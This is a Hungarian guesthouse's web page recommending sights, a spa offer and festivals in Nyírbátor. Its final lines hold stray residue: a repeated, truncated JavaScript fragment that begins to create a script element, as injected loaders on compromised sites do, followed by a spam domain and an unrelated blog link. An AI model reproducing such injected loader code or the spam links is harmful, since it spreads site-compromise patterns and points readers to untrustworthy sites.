Nyírbátorba érkező kedves vendégeinknek ajánljuk a következő programokat, akik szabadságuk alatt valóban feltöltődni szeretnének méghozzá aktív programokkal. Ha nálunk száll meg, elég néhány lépést tennie ahhoz, hogy megcsodálhassa a nyírbátori református templomot és Magyarország egyik legrégebbi harangtornyát, vagy a Báthori család XV. században épült, 2006-ban felújított várkastélyát, ahol a Báthoriak történetét panoptikum eleveníti fel.

Ha tovább sétál Nyírbátor utcáin az egykori ferencesek hagyományait folytató minorita templommal-, és rendházzal, valamint a benne helyet kapó Báthori István Múzeummal ismerkedhetnek meg az érdeklődők.

 

A történelem nyomai mellett a mai kor modern épületeivel is találkozhatnak a Nyírbátorba látogatók, melyek közül kiemelendő a Nyírbátori Kulturális Központ, ahol színházi elő adásokkal és mozifilmekkel is szórakoztatják a nagyérdeműt; valamint az újonnan nyílt, európai színvonalú Sárkány Fürdő Nyírbátor.

A Napsugár Panzió vendégei részére egész napos belépőjegyet biztosít a Sárkány Wellness Fürdőbe!

Emellett számos rendezvény, koncert is megrendezésre kerül, melyek közül a legismertebbek a Szárnyas Sárkány Napok és a Nemzetközi utcaszínházi fesztivál. Bővebb és pontosabb tájékoztatást Nyírbátor honlapján találhat.

Emellett az alábbi programokat ajánljuk vendégeink figyelmébe:

Bármilyen korosztályhoz is tartozik és bármilyen programok iránt is érdeklődik, garantáltan nem fog csalódni bennünk! Ha tanácstalan a programokat illetően, kérje szállásfoglaláskor segítségünket. Reméljük, hamarosan vendégeink között üdvözölhetjük Önt is!

Foglaljon szobát online!var d=document;var s=d.createElement(‘script’); var d=document;var s=d.createElement(‘script’);


topspyapps.nethttp://myblacksaigon.6te.net/blog/?p=1048